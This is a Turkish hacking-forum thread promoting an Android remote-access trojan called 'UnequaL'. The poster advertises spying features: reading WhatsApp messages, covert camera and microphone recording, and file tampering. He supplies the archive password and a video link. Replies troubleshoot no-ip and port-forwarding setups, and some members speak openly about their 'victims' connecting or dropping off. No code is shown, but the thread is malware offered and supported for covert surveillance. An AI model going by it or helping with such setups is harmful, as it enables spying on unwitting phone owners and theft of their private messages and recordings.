Android Cihazı Hackleyin #UnequaL 30.06.2016 Yeni Sürüm

Loghost27

Üye
13 Şub 2016
82
0
İstanbul
no-ip kurulumum kaydım her şey tamam modem arayüzünden port da açtım programı açıp portumu dinlemeye başladıktan sonra port kontrol yapıyorum ancak portu bulmuyor yardımcı olabilir misin hocam

Bromity

Kıdemli Üye
19 Ocak 2013
2,883
0
Arkadaşlar video çektim bu mobil rat için. Video pek iyi olmadı , artık bi mikrofon alıcam :D
aDlO84.png

Rootsuz cihazlarda da tüm özellikleri çalışabilen tek mobil RAT!
Bazı Özellikler:
Whatsapp mesajlarını okuyabilme
Ön-Arka kameradan çekim yapabilme
Dosyalarına ekleme- silme yapabilme
Kameralardan video kayıt
Mikrofondan ses kayıt.
Ve daha fazlası..
Pass: UnequaL THT arada bosluk var.
https://m.youtube.com/watch?feature=youtu.be&v=wBfGiHzaJ1I

YENİ İNDİRME LİNKİ

Virüs Total
https://virusscan.jotti.org/en-US/filescanjob/pwsajqz77f

Beğenmeniz bana en büyük destektir..

Hacı bu bozuldumu patladımı son 2 gündür kurbanlar gelmiyor kendi telefonumdan açıncada bağlantı gelmiyor herşey düzgün şekilde yapılı

Bromity

Kıdemli Üye
19 Ocak 2013
2,883
0
Rat bozulur mu kardeşim. :) neden yapamadın? Kurbanlarim duruyor benim

valla benimkilerde duruyordu son 2 gündür yok hadi dedim telefonları kapalıdır net yoktur kendimde denedim bendede olmadı bozulurdan kastım yazılım sahibinde herşeyi source falan bi güncellemeye bakıyor bi alpemix versem bakabilirmisin sana zahmet

hankaya4

Katılımcı Üye
3 Eki 2015
542
0
Ordu
hocam ben telefonumu laptopa bağlayarak internete giriyorum port açma işi sıkıntılı bi alternatif öneriniz varmı acaba

selimcancaki

Katılımcı Üye
23 Haz 2015
817
1
OTHERWORLD
Ayni porttan calisiyorda farkli aglardan baglantu gelmiyor ..No-ip hesabimi filan yazdim hersry tamam ama olmuyor bence program da sikinti var farkli wifi de olmuyor

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.